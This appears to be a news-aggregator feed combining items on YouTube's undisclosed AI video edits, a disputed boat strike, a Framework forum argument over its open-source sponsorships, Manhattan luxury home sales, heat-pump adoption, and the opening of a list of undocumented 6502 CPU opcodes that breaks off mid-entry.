Brendan Carr, the chairman of the Federal Communications Commission (FCC), the US agency which regulates national and international radio, television, wire, satellite, and cable communications, condemned the EU.

In a post on X, Carr accused the bloc of "fining a successful US tech company for being a successful US tech company."

"Europe is taxing Americans to subsidize a continent held back by Europe’s own suffocating regulations," Carr said.

Edited by: Roshni Majumdar

YouTube caught making AI-edits to videos and adding misleading AI summaries

Hacker News
social.growyourown.services
2025-12-06 01:15:48
Comments...

YouTube caught making AI-edits to videos and adding misleading AI summaries

Hacker News
www.ynetnews.com
2025-12-06 01:15:48
Comments...
Original Article

Popular YouTubers Rick Beato and Rhett Shull discovered the platform was quietly altering their videos with AI; the company admits to a limited experiment, raising concerns about trust, consent and media manipulation

YouTube has begun quietly using artificial intelligence to enhance videos by some of its top creators—without notifying them or their audiences.

The practice was first noticed by two well-known American YouTubers popular among music enthusiasts: Rick Beato and Rhett Shull. Both run channels with millions of subscribers. Beato, a music educator and producer with more than 5 million subscribers, said he realized something was “off” in one of his recent videos.

“I thought I was imagining it, but my hair looked strange, and it almost looked like I was wearing makeup,” he said in a post.

It turns out YouTube has been experimenting in recent months with AI-powered video enhancement, even altering YouTube Shorts without creator approval. The changes are subtle: sharper shirt folds, smoother or more highlighted skin, even slightly altered ears. Most viewers would not notice, but Beato and Shull said the edits made their videos feel unnatural.

Shull, a guitarist and creator, posted a video about the issue. “It looks like something AI-generated,” he said. “It bothers me because it could erode the trust I have with my audience.”

Image: YouTube Shorts (Photo: Shutterstock)

Complaints about odd changes to Shorts surfaced on social media as early as June, but only after Beato and Shull spoke out did YouTube confirm the experiment.

Rene Ritchie, YouTube’s creator liaison, acknowledged in a post on X that the company was running “a small experiment on select Shorts, using traditional machine learning to clarify, reduce noise and improve overall video clarity—similar to what modern smartphones do when shooting video.”

That explanation drew further criticism. Samuel Woolley, a disinformation expert at the University of Pittsburgh, said the company’s wording was misleading. “Machine learning is a subset of artificial intelligence,” he said. “This is AI.”

The controversy highlights a wider trend in which more of what people see online is pre-processed by AI before reaching them. Smartphone makers like Samsung and Google have long used AI to “enhance” images. Samsung previously admitted to using AI to sharpen moon photos, while Google’s Pixel “Best Take” feature stitches together facial expressions from multiple shots to create a single “perfect” group picture.

“What’s happening here is that a company is altering creators’ content and distributing it to the public without their consent,” Woolley said. Unlike Photoshop filters or social media effects, he warned, YouTube’s AI edits add another hidden layer between audiences and the media they consume—raising concerns about authenticity.

While Woolley warned of eroding public trust, Beato remained more optimistic. “YouTube is always working on new tools and experimenting,” he said. “They’re an industry leader, and I have nothing bad to say about them. YouTube changed my life.”

Still, critics say even minor retouching without disclosure sets a troubling precedent. YouTube is home not only to entertainment, but also to news, education, and informational content—areas where accuracy and authenticity matter.

The quiet rollout suggests a future in which AI may increasingly reshape digital media before users even press play.

Video Collapses Hegseth’s Defense of Boat Bombing

Portside
portside.org
2025-12-06 01:06:03
Video Collapses Hegseth’s Defense of Boat Bombing barry Fri, 12/05/2025 - 20:06 ...
Original Article

Defense Secretary Pete Hegseth defended a deadly follow-up strike on a suspected drug boat in the Caribbean, citing the "fog of war." (Screen grab)

Members of Congress were just permitted to view the video of the second boat-bombing strike that's consuming Washington in controversy, during a classified briefing with Admiral Frank Bradley, who oversaw the operation. What they saw was deeply unnerving. And it pushes Defense Secretary Pete Hegseth's story closer to collapse.

Representative Adam Smith, ranking Democrat on the Armed Services Committee, said in an interview that the video of the second strike—which killed two men who’d been clinging to the wreckage of a boat destroyed in an earlier strike—badly undermines Hegseth’s stance in this scandal.

“This did not reduce my concerns at all—or anyone else’s,” Smith told me. “This is a big, big problem, and we need a full investigation.”

Smith said the video shows two men, sitting without shirts, atop a portion of a capsized boat that was still above water. That portion, Smith said, could barely have fit four people.

“It looks like two classically shipwrecked people,” Smith told me. But in the briefing, lawmakers were told that “it was judged that these two people were capable of returning to the fight,” Smith added. He called it a “highly questionable decision that these two people on that obviously incapacitated vessel were still in any kind of fight.”

Lawmakers pressed Bradley for a “considerable period of time” on the obviously incapacitated nature of the two men, Smith says. And the response was deeply unnerving. “The broader assumption that they were operating off of was that the drugs could still conceivably be on that boat, even though you could not see them,” Smith said, “and it was still conceivable that these two people were going to continue on their mission of transmitting those drugs.”

To be clear on what this means: The underlying claim by Trump and the administration is that all of the more than 80 people killed on these boats are waging war against the United States. They are “narco-terrorists,” in this designation. But this very idea—that these people are engaged in armed conflict with our country—is itself broadly dismissed by most legal experts. They should be subject to police action, these experts say, but not summary military execution, and Trump has effectively granted himself the power to execute civilians in international waters.

Yet here it gets even worse. The laws of war generally prohibit the killing of people who are no longer “in the fight” in any meaningful sense, specifically including the shipwrecked. But these lawmakers were told in the closed-door briefing that the two men were still deemed to be “in the fight” by virtue of the fact that there could have been still-transmittable drugs in the capsized and wrecked boat, Smith says. And that those two men sitting atop the wreckage could have continued with their delivery of them.

“The evidence that I’ve seen absolutely demands a further and continued investigation,” Smith told me. “It strains credibility to say that they were still in the fight.”

This badly undermines the story Hegseth has told. He has said that he did not see the two men before the second strike was ordered, suggesting both that he’d gone off to do other things and that the “fog of war” had prevented a clear viewing of the two men.

Obviously what these lawmakers saw contradicts the latter suggestion: The two men were, in Smith’s telling, very visible, so the “fog of war” line appears to be nonsense. And Hegseth’s implication that the strike was justified due to confusion about the men’s status also appears to be in profound doubt.

Republicans who have seen the video have insisted this was all lawful. Senator Tom Cotton, for instance, said it showed the two survivors attempting to flip a boat “loaded with drugs bound for the United States.” But if Smith’s account of the video is correct, that’s in doubt: The boat looked incapacitated, and the drugs weren’t in fact visible.

The military officials stressed in the briefing that Hegseth never directly ordered them to “kill them all,” meaning all the people on board, something that was implied by Washington Post reporting and that Hegseth denied to Trump. And they confirmed that Hegseth didn’t give the direct order for the second strike, Smith says.

But they did say that Hegseth’s declared mission was to kill all 11 people, Smith notes. “It was, ‘Destroy the drugs, kill all 11 people on board,’” Smith told me. “It is not that inaccurate to say that the rules of engagement from Hegseth were, ‘Kill all 11 people on that boat.’” And so, by all indications, that second strike appears to have been ordered to comply with Hegseth’s command.

Smith did confirm that he’s “somewhat satisfied” by the intelligence he saw that the boat originally did have drugs on it. But again, the idea that any of these people, even if they were trafficking drugs, are “in the fight”—in the sense of waging war against the United States—is already indefensible to begin with.

“They have an unbelievably broad definition of what ‘the fight’ is,” Smith said, and in that context, the order to kill all 11 people on the boat, no matter what, looks even worse: “It’s bad.”

Another Democrat, Representative Jim Himes, seconds this interpretation. "You have two individuals in clear distress without any means of locomotion with a destroyed vessel, who were killed by the United States," he said.

Importantly, Smith told me that he and others urged military officials to release the video. “I think that video should be public,” Smith said, adding that he also wants to see the much-discussed legal memo supposedly authorizing the strikes released as well. But the military officials said public release isn’t their call. So now the pressure should intensify on Trump and Hegseth to authorize release of both.

There’s also been some discussion of radio communications that the two men may have sent for help. The idea is supposed to be that if they could get assistance, they could get back “in the fight,” meaning they were legit targets. But Smith said the officials confirmed to lawmakers they have no recording of these communications. So this piece of support for the Hegseth-Trump stance may not really exist.

Brian Finucane, a former State Department lawyer, says the entire operation is illegal but that a full investigation could establish more clearly whether this particular strike deliberately targeted the men or just targeted the boat. From what we’re now learning from Smith and others, it clearly seems like the former.

“Based on the descriptions of lawmakers, it does sound as if the men were shipwrecked, and targeting them would be a war crime,” Finucane told me. “It sounds like the men were the target.” He said the stories being told by Hegseth and others are now falling apart: “None of these narratives withstand scrutiny.”

Greg Sargent is the host of The Daily Blast podcast. A seasoned political commentator with over two decades of experience, he was a prominent columnist and blogger at The Washington Post from 2010 to 2023 and has worked at Talking Points Memo, New York magazine, and the New York Observer. He is also the author of the critically acclaimed book An Uncivil War: Taking Back Our Democracy in an Age of Disinformation and Thunderdome Politics.


Reminder about Framework Laptop

Lobsters
community.frame.work
2025-12-06 00:53:11
Comments...
Original Article

1

Hi,

I am not exactly sure how best to frame this, but recent events have got me wondering where exactly Framework, as a company, stands with regards to human rights and equality.

If I understand correctly (and please do correct me if I am wrong), it seems like Framework has started sponsoring Hyprland:

So I presume this is fact: Framework, as a company, has decided to sponsor a Wayland compositor that is well known for being led as a rather "toxic and hateful community".

Separately, but on the same day, Framework seems to be promoting, in this tweet, another rather questionable project:

Omarchy is authored by David Heinemeier Hansson, also known as DHH, probably best known as the author of Ruby on Rails but also, apparently, a racecar driver.

DHH is also a right-wing conspiracy nut who seems to believe in the great replacement theory, according to this:

DHH was also involved in the recent upheaval in the Ruby community, where Rubygems, a core component of the Ruby ecosystem, was the victim of a hostile takeover, which DHH supported.

Even if you decided (questionably) to ignore the man and judge only his technical merit, the recent Rubygems drama should give anyone pause.

So my question is: where does Framework stand around this?

Ever since I got my first Framework laptop, I've been excited by this company and its products. I bought a Framework 13 12th gen when it came out, and now I am typing this on a Framework 12. I've been recommending Framework for years at this point.

But if Framework keeps not only promoting and enabling toxic communities to its users but even sponsoring them, I'm afraid that not only will I have to stop buying and recommending Framework, but that perhaps a more widespread boycott would be in order.

Surely this is just a mistake and a misunderstanding that could be promptly corrected.

2

We support open source software (and hardware), and partner with developers and maintainers across the ecosystem. We deliberately create a big tent, because we want open source software to win. We don’t partner based on individuals’ or organizations’ beliefs, values, or political stances outside of their alignment with us on increasing the adoption of open source software. We’ve sent out large quantities of hardware to folks at Fedora, Bluefin, Bazzite, NixOS, Arch Linux, Linux Mint, Omarchy, and many other distros, and have sponsored either the organizations directly or events with Linux Foundation, LVFS, NixOS, Debian, KDE, Hyprland, and others. Within the team itself, personal distro and OS preferences span basically every Linux distro you can imagine along with FreeBSD. I personally am running machines with Fedora (for machine learning), Bazzite (for gaming), Omarchy (general productivity), and Windows 11 (when I have to).

I definitely understand that not everyone will agree with taking a big tent approach, but we want to be transparent that bringing in and enabling every organization and community that we can across the Linux ecosystem is a deliberate choice.

Edit to add: This is a comment I recently added deep in this thread, but pasting it here so that folks don’t need to dig through to find it:

Update on Oct 14th, 2025:
A number of folks have reached out to us over the last few days to ask that we share more about which organizations we sponsor. This is certainly something we should have been doing already for transparency, and today we’ve published the list of all of our 2025 sponsorships so far, which total around $215,000. We’ll be keeping this list up to date over time. In addition, we would love nominations of a broader set of mission-aligned organizations we can sponsor, and we’ve created a submission form for this. As you can see from the list for this year, our focus is primarily around funding organizations developing Linux distros and window managers, open source firmware, educational organizations doing open source hardware development, and open source infrastructure that our hardware products and website depend on.

Since this thread started in part around our donation to Hyprland, we wanted to provide additional specific context there. We decided a few months ago to be more deliberate about funding the maturity of the Linux desktop by providing support to both distros and window managers. On the latter, we started sponsorship discussions with the GNOME Foundation ($1,000/month), KDE Foundation ($10,000/year), and Hyprland (600€/month) at the same time, with the plan to announce them together. We sent the funding to Hyprland and GNOME Foundation last week, and have been working with KDE Foundation to finalize our sponsorship. We’ve also been working with GNOME Foundation on announcement timing, as they needed to update the sponsor list on their site. We missed on letting Hyprland know that we wanted to announce these together, and they shared the sponsorship shortly after receiving it last week.

On Hyprland specifically, we were aware that there was past toxicity and controversy in their community, so we did research into it before deciding if we could sponsor the project. What we found was that there were past failures in moderation early in the creation of the project that had resulted in a toxic community, that the project lead vaxry had overhauled moderation years ago as a result, and that the community as it currently stands does not represent the one in which the issues occurred. Over the last few days, we’ve gotten additional outreach from others in the community who were initially concerned about our sponsorship of Hyprland who did their own research and came to a similar conclusion to what we did.

Going forward on this topic:

  1. We are going to continue to update our list of sponsorships as we go to give transparency on what we’re monetarily backing. As noted above, in general we want to coordinate the updates with the organizations we sponsor so that their website updates and announcements happen around the same time as ours.
  2. We’re requesting that you provide additional nominations of mission-aligned organizations that we should sponsor. Note that in the near-to-mid term, we’re still prioritizing organizations focused on open source firmware, software, and hardware that make the ecosystem around our products more mature and accessible. If you have recommendations of other good organizations, please feel free to submit those in the form as well, but they may come into future funding cycles.
  3. Before we sponsor an organization, we will continue to research and confirm that as they currently exist, they uphold appropriate community standards and are structurally set up for that to continue to be the case.
  4. Although this thread has continuously spiraled into unproductive directions that have needed active moderation, we do still plan to keep it open for now and merge additional related new threads into it. Please remember to follow our forum rules though and keep conversation productive and free of personal attacks.

3

With all due respect, I think you profoundly misunderstand the nature of my concern here.

This is not a “I do not like this distribution” kind of argument.

This is a “the people you are sending my money to want me and my friends dead or deported” kind of argument.

The “big tent” argument works fine if everyone plays by some basic civil rules of understanding. Stuff like codes of conduct, moderation, anti-racism: surely we agree on those things? A big tent won’t work if you let in people that want to exterminate the others.

I have no problem with Fedora, Bluefin, Bazzite, Arch Linux, Linux Mint, Linux Foundation, LVFS, Debian, KDE… What I have a problem with is Framework consistently, repeatedly encouraging and now sponsoring individuals that have shown themselves to be absolutely destructive to the open source community.

Claiming that this is about “increasing the adoption of open source software” really misses the core part of the narrative here, which is that those people have been excluded from open source communities because they were so hateful, so destructive, that their mere presence was more harmful than beneficial.

DHH is a threat to the free software community as a whole at this point. The damage he ended up doing to the Ruby community might end up outweighing entirely his contributions to Rails, which is no small feat.

Vaxry (from Hyprland) was banned from freedesktop.org, wreaking havoc in the standardization of Wayland protocols that the whole community could have benefited from.

If you believe helping and sponsoring those people helps the open source community, we have quite divergent views on the best way forward and, perhaps, it is best if you concentrate on making hardware and leave the open source community alone.

In any case, thanks for your quick response, @nrp, and thanks for building those awesome products.

4

Thanks, I appreciate you also replying in good faith. I don’t think this is likely to be a topic we’ll be able to come to alignment on within a community thread. We’re unfortunately in a world where it’s hard to have nuanced discussion, even if we preemptively agree on 95% of topics and want to discuss the remaining 5%, in a public forum.

5

Perhaps it is indeed best to let it rest for now. I’ll certainly sleep on it now! :slight_smile:

6

Thanks a lot for your continued support of open source. I use projects daily that you donate money to, which makes me happy that I purchased my Framework Desktop rather than some offbrand Strix Halo mini-PC for a few bucks less.

In particular, I think that Hyprland is quite nice and I’ve been using it for about a year now. I haven’t touched other Hyprland distros, but I like that some people have found ways of making the normally very steep learning curve of Hyprland a little bit shallower for people to get used to it.

Can we not do this? It’s just a distro.

8

But Nirav,

Why is the Social Media account gushing over omarchy?

Out of all those listed projects you sponsor, the Twitter account has mentioned Omarchy ~22 times since just August. The other projects you mention have barely gotten any attention, even to the point of misattributing Omarchy as Arch Linux, which you do support.

Why are you pandering towards dhh and the omarchy project? What is the goal here?

I know in today’s hyper-politicized day-to-day this might be hard to see, but it is because Omarchy is awesome. That isn’t a political statement in any way. Just a nerdy, “this software rocks my socks” kind of thing.

I’m not saying anything beyond that above. Full stop.

I personally appreciate Framework’s efforts to create a big tent. We need that. Division in the computing world is massively overblown and is purely manufactured in many cases.

10

Yeah, if you make claims like that, maybe best if you provide some source or context of when these people have actually said they want anyone dead?

Thank you Nirav, your big tent approach is especially appreciated in these times of political polarisation.

Even so, as a public account of a company that will likely want to stay active in and around the open source community as a whole, you should check who you interact with first and stay away from controversial figures in that space.

I’m German; I just can’t say “whatever” and move on, not in these times. I’ll send back my Framework 12, a device I truly love. A device I did all my workload for Arch Linux on for a whole month, as well as my day-to-day job stuff.

The big tent approach ends where hate hurts people in the space who just want to contribute and have a fun time around others.

I don’t think that is possible in the open source world. I think the open source world attracts mostly controversial figures.

I also don’t think any one person or organization can speak for open source. That is the whole point. Decentralized. Hundreds of thousands of people with varying ideas and beliefs made all of the software in the open source world.

14

Those “remaining 5%” are either supporting fascism or not supporting fascism, and thus way more important than the other 95%.

If you keep this up, buying Framework laptops means directly contributing money to the pockets of people who want me gone or dead. It doesn’t matter that it’s the best laptop available and I’ve had good experiences with every Framework device I’ve bought so far; I will have to settle for worse in the future because I morally can’t justify giving my money to a company that forwards it to fascists.

What? I am relatively new to knowing and talking with DHH, but I have not seen anything he has said that would lend credence to what you are saying here. Furthermore, these are heavy accusations. I see zero shred of evidence on the internet or revolving around Omarchy. I haven’t seen a single negative thing coming out of my discourse around Omarchy. The focus is software excellence, and it is awesome.

If Framework is now knowingly giving money directly to far-right, anti-immigration fascists, I will no longer give money to Framework or recommend Framework. And I will make sure everyone I know does the same. You could have made a good choice here. This “big tent” approach only works when some of the people in the “big tent” aren’t trying to get the other ones exiled or killed. Wrong side of history.


Addendum to this: I personally would love if this was an “apolitical” conversation only about software, and disagreements about software. But the people that Framework is sponsoring are using their platforms – earned in the first place by writing software – to promote fascist conspiracy theories that are about anything but software.

This is not a case of “oh those lefty nutjobs are canceling people again”, it’s a case of “these racists [like DHH] are so damn racist that they can’t stop using their platform to be racist as hell, even though they are ostensibly software developers, and could have chosen to stay in their lane and write software.” Have yourself a little ponder about who started it when you’re saying things like “oh let’s keep software apolitical.”


Additional edit: I think it’s quite telling that a community response of “I’m not happy with this development, please consider changing your mind or I’m going to spend my money elsewhere” is now being met in this thread with responses including inflammatory fascist and racist talking points, transphobia, etc, while Framework says and does nothing about it. It shows exactly the sorts of things Framework is permitting in their “big tent” by rewarding right-wing extremists with money and sponsorship. What a way to tank a community that – a few years ago at least – seemed pretty welcoming and inclusive.

17

You may disagree with Drew DeVault but this was easily reachable with a simple google search.

So evidence and proof is the opinion of a known activist with specific political leanings? An activist that has said and done many controversial things as well, I might add.

This is a very odd thing to say. There are really crazy people out there; one recently assassinated a guy for just having conversations with people. Projecting untrue ideas onto those you disagree with is kinda the whole problem we are having.

That said, I applaud NRPs response here. I like good open source software. I do not care about the politics of the people behind the software, unless they are using that software to enforce beliefs that do not enhance my life, which is rare. In those cases, I simply find something better to use.

And remember, the great thing about open source software is you can fork it if you don’t like something about the original project. xlibre is an awesome example of this. Xorg was forked and now we are seeing real progress on what has long been a stale project.

20

You can also read and follow the links specifically to what DHH is saying. I find it odd in a conversation about big tent inclusion to immediately exclude something without reading it, though.

Rich NYers Aren’t Fleeing After All

Portside
portside.org
2025-12-06 00:44:06
Rich NYers Aren’t Fleeing After All barry Fri, 12/05/2025 - 19:44 ...
Original Article
Rich NYers Aren’t Fleeing After All

Zohran Mamdani at the Resist Fascism Rally in Bryant Park on Oct 27th 2024 | photo: Bingjiefu He (Creative Commons Share Alike 4.0)

Fears that Zohran Mamdani's election as mayor would trigger an exodus of wealthy New Yorkers appear to be overblown, as sales of Manhattan luxury homes surged in November. According to data from Miller Samuel Inc. and Douglas Elliman, contracts were signed for 176 homes priced at $4 million or higher last month—a 25% rise from October, per Bloomberg.

The deals included two $24 million condos at high-profile buildings on the Upper East Side and Billionaires' Row. Critics had warned that Mamdani's victory would scare off the city's rich, whose taxes are vital to the city budget. But Donna Olshan of Olshan Realty says the numbers tell a different story. Her firm's report found that 41 luxury contracts were signed during the week of the election, with more than half coming after Mamdani's win. "There is no Mamdani effect," Olshan said. "The numbers just aren't bearing that out."

Per ABC News, some experts predicted this outcome weeks ago, noting that whenever wealthy residents warn they'll leave states like California during, say, a tax increase, "the vast majority stay put for reasons that hold true across income brackets: They like where they live, and want to remain close to friends, family, and professional networks." A tax attorney estimates that, over the course of his career, for every 10 people who've asked about what it would take to leave New York, only one ends up following through, due to the financial and social complexities in making such a move, per the New York Times.

Industry insiders point to other factors fueling the Big Apple market, including a stock market rally and robust Wall Street bonuses, per the Journal. Miki Naftali of the Naftali Group said demand remains strong, with no slowdown in sales at his company's Manhattan developments, where condos can fetch as much as $28 million. "Yes, there is a new mayor, and there are a lot of worries, but our clients are saying, 'We love New York,'" Naftali said.


From Rockets to Heat Pumps

Hacker News
www.heatpumped.org
2025-12-06 00:41:42
Comments...
Original Article

Usually I’m the one interviewing people about electrification on the Heat Pumped Podcast. Recently, I got to flip roles a bit as a guest on Less Talk, More Action. I was stoked to get the invite - I loved their interview with Panama Bartholomy from Building Decarbonization Coalition, who is ever the optimist, reminding us that we ARE making progress electrifying.

Joel and Owen peppered me with questions about heat pumps, bad incentives, and why on earth someone would leave rockets for HVAC.

🎧 Listen to the full episode

The Question Everyone Asks: “Will a Heat Pump Save Me Money?”

Let’s start with the uncomfortable part.

Owen opened with the question I hear constantly:

“How do we get the masses to adopt heat pumps when gas is so much cheaper than electricity, especially in California?”

  • Heat pumps really are 3–4x more efficient than gas furnaces.

  • But in much of California, electricity is also 3–4x more expensive than gas.

  • That means the operating costs often come out roughly even, maybe a bit better, maybe a bit worse, depending on the house and rate structure (see the quick sketch below).
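To make that concrete, here is a back-of-envelope sketch in Python. The prices and efficiencies below are illustrative assumptions, not figures from the episode; the point is just that dividing the energy price by the efficiency puts gas and heat pumps in the same ballpark per unit of delivered heat.

    # Rough operating-cost comparison using illustrative California-ish prices.
    # All numbers are assumptions for this sketch, not quotes from the article.

    THERM_KWH = 29.3  # one therm of gas is about 29.3 kWh of thermal energy

    def gas_cost_per_kwh_heat(price_per_therm=2.50, afue=0.95):
        """Cost of one kWh of delivered heat from a gas furnace."""
        return price_per_therm / (THERM_KWH * afue)

    def heat_pump_cost_per_kwh_heat(price_per_kwh=0.35, cop=3.5):
        """Cost of one kWh of delivered heat from a heat pump."""
        return price_per_kwh / cop

    print(f"gas furnace: ${gas_cost_per_kwh_heat():.3f} per kWh of heat")        # ~$0.090
    print(f"heat pump:   ${heat_pump_cost_per_kwh_heat():.3f} per kWh of heat")  # ~$0.100

Cheaper electricity or a higher-COP unit tips it toward the heat pump; cheap gas tips it back. That is the “roughly even” math in a nutshell.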

I wish I could tell people, “Install a heat pump and your bills will drop by 50%.” Right now, in most of California, I can’t. And I don’t try to force that narrative.

So instead of pretending there’s a huge savings where there isn’t, I lean on what is true:

  • You get heating and cooling in one system.

  • Comfort is better and more stable - no more furnace cycling on and off at full blast.

  • There’s no combustion, no carbon monoxide risk.

  • With incentives, upfront cost is often lower than installing a traditional AC and furnace.

Is it a financial slam dunk everywhere? No.
Is it a better system that future-proofs the home, often at similar lifetime cost? In most cases, yes.

A Quick Heat Pump Explainer

When I say “3–4x more efficient,” here’s what I mean in plain terms:

  • A gas furnace is ~80–95% efficient. You burn gas, some energy goes out the flue, the rest warms your home. You’re creating heat from fuel.

  • A heat pump doesn’t “make” heat; it moves it.

    • Even on a cold day, molecules in the air are moving—that motion is heat.

    • A heat pump pulls that heat out of the air, concentrates it, and moves it indoors.

    • It’s the same physics as your refrigerator or air conditioner, just run in reverse in winter.

Heat pumps move heat instead of generating it
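If “300–400% efficient” sounds like it breaks physics, here is the same idea in numbers. COP is just heat delivered divided by electricity consumed, and the values below are illustrative assumptions:

    # COP = heat delivered / energy purchased. A furnace can never beat ~1.0
    # on this scale, because it creates heat from fuel instead of moving it.
    for label, cop in [
        ("gas furnace (95% AFUE)", 0.95),
        ("heat pump, mild day", 4.0),
        ("heat pump, cold snap", 2.5),
    ]:
        print(f"{label}: 1 kWh in -> {cop:.2f} kWh of heat out")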

How I Ended Up Trading Rocket Engines for Heat Pumps

People love to ask how I went from working at companies like SpaceX and Blue Origin to HVAC.

Standing by a Blue Origin lunar lander - I helped design its engine

To be honest, I didn’t wake up one day and decide to go into heat pumps. It was a winding path, but I’m grateful I found my way to this space.

When I eventually started DMing homeowners on Reddit and Nextdoor asking them, “What was your experience getting a heat pump?”, the answers were almost all identical:

  • “It’s really expensive.”

  • “I don’t trust my contractor.”

  • “I’m getting conflicting advice.”

Seeing the obvious pain from real people and realizing that I already understood the technical side was enough to pull me in, eventually leading to my heat pump installation company Vayu.

The Bar Is Still So Low

What’s wild, and a little sad, is how low the baseline for “good contractor” still is.

  • My mom texts four contractors; one replies. That’s who gets the job.

  • My in-laws had multiple appointments rescheduled by their solar installer, often with techs showing up hours late.

  • Owen talked about winning a $7M contract basically by just being responsive.

This is part of why I keep saying:

If you want to do something meaningful in climate and have a high tolerance for chaos, start an HVAC company.

Hearing the same frustrations over and over led me to start my own heat pump company

You don’t need to be the biggest. You just need to show up, do what you say you’re going to do, and care about the quality of your work.

Incentives, the IRA, and Why Some “Climate Money” Backfires

  • People heard for years that huge electrification rebates were coming.

  • Some homeowners delayed critical work, hoping for $8,000+ off a heat pump.

  • In places like Northern California, once funds finally went live, they were gone in a month or two.

So what did we actually achieve?

  • We froze some homeowners in place waiting for programs.

  • We created a huge expectation mismatch.

  • We did not fundamentally change the default equipment being installed.

Meanwhile, there is a much cheaper lever we could have pulled instead:

  • The cost difference between a one-way AC and a heat pump is basically a reversing valve (~$30–$50 in parts).

  • Every major manufacturer already sells both the AC and corresponding heat pump versions of their product.

  • If we subsidized that tiny delta at the manufacturer or distributor level, one-way ACs could just quietly fade out.

Every “normal” AC replacement would automatically be a heat pump. Not because the homeowner read a whitepaper, but because that’s what’s on the truck.

Perfectionism Is Quietly Killing Decarbonization

The perfectionist playbook says to tackle a home in a strict order:

  1. Air seal and insulate

  2. Replace windows

  3. Upgrade panel and wiring

  4. Maybe, finally, install the heat pump

On a whiteboard, that looks great. In real life:

  • Furnaces die right before a cold snap .

  • People don’t have unlimited capital, bandwidth, or patience.

  • The more steps you stack up front, the more likely they are to say:
    “Just put in another gas furnace.”

In California, at least, I’m very comfortable with electrify first, optimize later:

  • Even leaky, old homes can usually be handled by a modestly sized inverter heat pump.

  • If you upgrade windows and insulation later, the same heat pump just runs at a lower output.

Coming from rocketry, I think in test cycles. You build, test, learn, adjust. If you wait for the perfect model, you never launch anything.

Homes are no different.

Why I’m Still Optimistic

We often talk about the ugly in this newsletter - the barriers that are slowing down widespread heat pump adoption. I see a lot of dysfunction up close: bad incentives, messy rates, hilariously low contracting standards.

But here’s what gives me real hope:

I’m in a Facebook group with a bunch of small HVAC contractors. Recently someone asked: “Who’s installing heat pumps these days?”

A couple of years ago, that would’ve drawn skeptical or hostile replies. This time, I’d guess 80–90% of the responses were some version of:

  • “We’re doing a lot of heat pumps now.”

  • “Most of our installs are heat pumps.”

  • “We only do heat pumps.”

Not from giant, well-branded west coast climate companies. From one- and two-truck shops all over the place.

This is market transformation in action

That’s the kind of quiet, unglamorous market shift that actually matters.

So I’m going to keep doing what I’ve been doing: Talking about heat pumps and installing them.

If any of this nudges one more person to leave the sidelines - whether that means starting a trades business, fixing a broken rate design, or just replacing a dead furnace with a heat pump instead of another gas box - it’s worth it.

Extra Instructions of the 65XX Series CPU

Hacker News
www.ffd2.com
2025-12-06 00:38:50
Comments...
Original Article
"Extra Instructions Of The 65XX Series CPU" By: Adam Vardy (abe0084@infonet.st-johns.nf.ca) [File created: 22, Aug. 1995... 27, Sept. 1996] The following is a list of 65XX/85XX extra opcodes. The operation codes for the 6502 CPU fit in a single byte; out of 256 possible combinations, only 151 are "legal." This text describes the other 256-151= 105 operation codes. These opcodes are not generally recognized as part of the 6502 instruction set. They are also referred to as undefined opcodes or undocumented opcodes or non-standard opcodes or unofficial opcodes. In "The Commodore 64 Programmer's Reference Guide" their hexadecimal values are simply marked as future expansion. This list of opcodes was compiled with help from "The Complete Inner Space Anthology" by Karl J. H. Hildon. I have marked off the beginning of the description of each opcode with a few asterisks. At times, I also included an alternate name in parenthesis. All opcode values are given in hexadecimal. These hexadecimal values are listed immediately to the right of any sample code. The lowercase letters found in these examples represent the hex digits that you must provide as the instruction's immediate byte value or as the instruction's destination or source address. Thus immediate values and zero page addresses are referred to as 'ab'. For absolute addressing mode the two bytes of an absolute address are referred to as 'cd' and 'ab'. Execution times for all opcodes are given alongside to the very right of any sample code. A number of the opcodes described here combine the operation of two regular 6502 instructions. You can refer to a book on the 6502 instruction set for more information, such as which flags a particular instruction affects. ASO *** (SLO) This opcode ASLs the contents of a memory location and then ORs the result with the accumulator. Supported modes: ASO abcd ;0F cd ab ;No. Cycles= 6 ASO abcd,X ;1F cd ab ; 7 ASO abcd,Y ;1B cd ab ; 7 ASO ab ;07 ab ; 5 ASO ab,X ;17 ab ; 6 ASO (ab,X) ;03 ab ; 8 ASO (ab),Y ;13 ab ; 8 (Sub-instructions: ORA, ASL) Here is an example of how you might use this opcode: ASO $C010 ;0F 10 C0 Here is the same code using equivalent instructions. ASL $C010 ORA $C010 RLA *** RLA ROLs the contents of a memory location and then ANDs the result with the accumulator. Supported modes: RLA abcd ;2F cd ab ;No. Cycles= 6 RLA abcd,X ;3F cd ab ; 7 RLA abcd,Y ;3B cd ab ; 7 RLA ab ;27 ab ; 5 RLA ab,X ;37 ab ; 6 RLA (ab,X) ;23 ab ; 8 RLA (ab),Y ;33 ab ; 8 (Sub-instructions: AND, ROL) Here's an example of how you might write it in a program. RLA $FC,X ;37 FC Here's the same code using equivalent instructions. ROL $FC,X AND $FC,X LSE *** (SRE) LSE LSRs the contents of a memory location and then EORs the result with the accumulator. Supported modes: LSE abcd ;4F cd ab ;No. Cycles= 6 LSE abcd,X ;5F cd ab ; 7 LSE abcd,Y ;5B cd ab ; 7 LSE ab ;47 ab ; 5 LSE ab,X ;57 ab ; 6 LSE (ab,X) ;43 ab ; 8 LSE (ab),Y ;53 ab ; 8 (Sub-instructions: EOR, LSR) Example: LSE $C100,X ;5F 00 C1 Here's the same code using equivalent instructions. LSR $C100,X EOR $C100,X RRA *** RRA RORs the contents of a memory location and then ADCs the result with the accumulator. Supported modes: RRA abcd ;6F cd ab ;No. 
